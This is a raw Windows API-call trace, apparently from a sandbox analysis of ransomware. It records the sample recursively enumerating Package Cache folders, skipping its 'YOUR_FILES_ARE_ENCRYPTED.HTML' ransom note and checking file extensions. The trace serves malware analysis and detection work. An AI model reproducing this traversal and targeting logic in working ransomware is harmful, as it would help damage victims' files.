RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.154] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508" [0170.154] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*" [0170.154] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.154] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.154] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.154] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned 96 [0170.154] GetProcessHeap () returned 0x270000 [0170.154] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.154] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages" [0170.154] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*" [0170.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.155] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.155] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc772da0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc772da0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0170.155] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned 117 [0170.155] GetProcessHeap () returned 0x270000 [0170.155] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.155] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86" [0170.155] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*" [0170.155] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc772da0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc772da0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.155] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc772da0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc772da0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.155] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb21afe00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xb21afe00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xcc831480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x14de75, dwReserved0=0x0, dwReserved1=0x60, cFileName="cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D", cAlternateFileName="CAB1CA~1.478")) returned 1 [0170.155] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned 191 [0170.155] lstrcmpW (lpString1="cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.156] PathFindExtensionW (pszPath="cab1.cab.47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned=".47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D" [0170.156] lstrlenW (lpString=".47816B003FB51FB3A3CAB1C7CE925A5BD830FC071AFC02CEF2DD91708583153D") returned 65 [0170.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0170.156] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 143 [0170.156] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.156] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.156] lstrlenW (lpString=".msi") returned 4 [0170.156] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0170.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc74cc40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc74cc40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc831480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.156] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0170.156] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc74cc40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc74cc40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc831480, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.156] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.156] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0170.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.156] GetProcessHeap () returned 0x270000 [0170.157] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.157] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.157] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.157] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.157] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.157] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.158] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.158] GetProcessHeap () returned 0x270000 [0170.158] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.158] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.159] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.159] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.159] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc8575e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc8575e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc8575e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.159] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.159] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0170.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.159] GetProcessHeap () returned 0x270000 [0170.160] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.160] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0170.160] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 75 [0170.160] GetProcessHeap () returned 0x270000 [0170.160] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.160] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0170.160] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*" [0170.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.160] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.160] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf974b9d0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xfc4f7ff0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0170.161] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 85 [0170.161] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.161] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.161] lstrlenW (lpString=".rsm") returned 4 [0170.161] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0170.161] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf96ff710, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xbe37ee50, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0170.161] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 92 [0170.161] lstrcmpW (lpString1="vcredist_x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.161] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.161] lstrlenW (lpString=".exe") returned 4 [0170.161] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0170.161] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.161] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0170.161] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.161] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc87d740, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc87d740, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc87d740, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.173] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.173] wnsprintfW (in: 